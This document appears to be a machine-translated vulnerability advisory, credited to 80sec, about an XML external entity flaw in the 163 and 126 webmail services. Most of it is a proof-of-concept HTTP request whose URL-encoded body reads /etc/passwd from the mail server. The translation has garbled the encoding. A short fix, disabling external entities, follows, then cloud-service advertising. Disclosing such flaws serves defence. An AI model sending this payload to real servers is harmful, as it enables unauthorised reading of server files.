Brief description: there are defects in the implementation of 163 mailbox and 126 mailbox. The xml Parsing Vulnerability released by 80sec allows you to read arbitrary files on the server, including server configuration files and sensitive database files, higher permissions may be obtained by combining context logic.
For details, 163 of servers use the xml format for data transmission when accepting and passing parameters. However, according to the 80 sec Security notice, if the server is incorrectly formatted when processing xml data, it will cause a security vulnerability. You can use the context permission of the application to obtain any file content and use the logic to obtain more permissions.
Proof of vulnerability: The Magic Code is simply adding malicious code to the xml header.
POST/js4/s? Sid = jaznlakzh1_sfgyiazzsbdowpsmytth & func = mbox: compose & l = compose & action = deliver HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript
Referer: http://twebmail.mail.163.com/js4/index.jsp? Sid = jaznlakzh1_sfgyiazzsbdowpsmytth
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;. net clr 2.0.50727; InfoPath.2;. NET4.0C;. NET4.0E)
Host: twebmail.mail.163.com
Content-Length: 1348
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: it's a secert
Var = % 3C % 3 Fxml + version % 3D % 221.0% 22% 3F % 3E % 3C % 21 DOCTYPE + copyright + % 5B % 3C % 21 ENTITY + hi80sec + SYSTEM + % 22 file % 3A % 2F % 2F % 2 Fetc % 2 Fpasswd % 22% 3E % 5D % 3E % 3 Cobject % 3E % 3 Cstring + name % 3D % 22id % 22% 3Ec % 3A1320845207002% 3C % 2 Fstring % 3E % 3 Cobject + name % 3D % 22 attrs % 22% 3E % 3 Cstring + name % 3D % 22 account % 22% 3E % 22Hi % 22% 26lt % 3 Bfukhaha % 40163.com% 26gt % 3B % 3C % 2 Fstring % 3E % 3 Cboolean + name % 3D % 22 showOneRcpt % 22% 3 Efalse % 3C % 2 Fboolean % 3E % 3 Carray + name % 3D % 22to % 22% 3E % 3 Cstring % 3E % 22 fukhaha % 40163.com% 22% 26lt % 3 Bfukhaha % 40163.com% 26gt % 3B % 3C % 2 Fstring % 3E % 3C % 2 Farray % 3E % 3 carray + name % 3D % 22cc % 22% 2F % 3E % 3 Carray + name % 3D % 22bcc % 22% 2F % 3E % 3 Cstring + name % 3D % 22 subject % 22% 3 Eshow + me + the + % 2 Fetc % 2 Fpasswd % 3C % 2 Fstring % 3E % 3 Cboolean + name % 3D % 22 isHtml % 22% 3 Etrue % 3C % 2 Fboolean % 3E % 3 Cstring + name % 3D % 22 content % 22% 3E % 26lt % 3 Bdiv + style % 3D % 27line-height % 3A1. 7% 3 Bcolor % 3A % 23000000% 3Bfont-size % 3A14px % 3Bfont-family % 3 Aarial % 27% 26gt % 3B % 26lt % 3 BDIV % 26gt % 3B % 26hi80sec % 3B % 26lt % 3B % 2 FDIV % 26gt % 3B % 26lt % 3B % 2 Fdiv % 26gt % 3B % 3C % 2 Fstring % 3E % 3 Cint + name % 3D % 22 priority % 22% 3E3% 3C % 2 Fint % 3E % 3 Cboolean + name % 3D % 22 saveSentCopy % 22% 3 Etrue % 3C % 2 Fboolean % 3E % 3 Cboolean + name % 3D % 22 requestreadreceept % 22% 3 Efalse % 3C % 2 Fboolean % 3E % 3 Cstring + name % 3D % 22 charset % 22% 3 EGBK % 3C % 2 Fstring % 3E % 3C % 2 Fobject % 3E % 3 Cboolean + name % 3D % 22 returnInfo % 22% 3 Efalse % 3C % 2 Fboolean % 3E % 3 Cstring + name % 3D % 22 action % 22% 3 Edeliver % 3C % 2 Fstring % 3E % 3 Cint + name % 3D % 22 saveSentLimit % 22% 3E1% 3C % 2 Fint % 3E % 3C % 2 Fobject % 3E
Solution: Modify the xml Parser on the server to disable external entities.
Source: 80sec
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
